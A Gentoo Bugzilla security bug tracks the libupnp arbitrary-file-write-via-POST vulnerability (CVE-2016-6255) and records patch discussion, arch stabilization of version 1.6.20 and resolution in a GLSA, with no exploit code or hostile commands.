Summary: | <net-libs/libupnp-1.6.18-r2: write files via POST | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | normal | CC: | gurligebis, maq, proxy-maint, thev00d00 |
Priority: | Normal | Keywords: | STABLEREQ |
Version: | unspecified | Flags: | kensington:
sanity-check+
|
Hardware: | All | ||
OS: | Linux | ||
URL: | http://www.openwall.com/lists/oss-security/2016/07/18/13 | ||
Whiteboard: | B2 [glsa cve blocked] | ||
Package list: |
=net-libs/libupnp-1.6.20
|
Runtime testing required: | --- |
Bug Depends on: | 598202 | ||
Bug Blocks: |
Description
Agostino Sarubbo
2016-07-19 07:46:50 UTC
Upstream issue: https://sourceforge.net/p/pupnp/bugs/132/ I've commited the patch to the tree. https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=11bbfa2ad250fc7af97ecc95100fe45dcd86356f I've left stable alone for now with and -r2 version of the stable package. I guess 1.16.19 would be a better candidate for stable as its been in the tree for ages. Maintainer(s), please advise if you are ready for stabilization or call for stabilization yourself. Sure, go ahead and stabilize. What version? 1.6.19-r1 Is 1.6.20 patched? Even though it is not stable it would still need to be patched. @ Yury: Upstream's v1.6.20 isn't fixed, see https://sourceforge.net/p/pupnp/code/ci/release-1.6.20/tree/upnp/src/genlib/net/http/webserver.c and compare with https://gitweb.gentoo.org/repo/gentoo.git/diff/net-libs/libupnp/files/CVE-2016-6255.patch?id=84d8f21cc2ca94d4f4a3146302726bd1c8fd3f47 However our v1.6.20 in tree contains the fix, see https://gitweb.gentoo.org/repo/gentoo.git/tree/net-libs/libupnp/libupnp-1.6.20.ebuild#n22 @ Arches, please test and mark stable: =net-libs/libupnp-1.6.20 Stable targets: alpha amd64 arm hppa ppc ppc64 sparc x86 amd64 stable x86 stable arm stable sparc stable ppc stable ppc64 stable Superseded by bug 598202. This issue was resolved and addressed in GLSA 201701-52 at https://security.gentoo.org/glsa/201701-52 by GLSA coordinator Aaron Bauman (b-man). |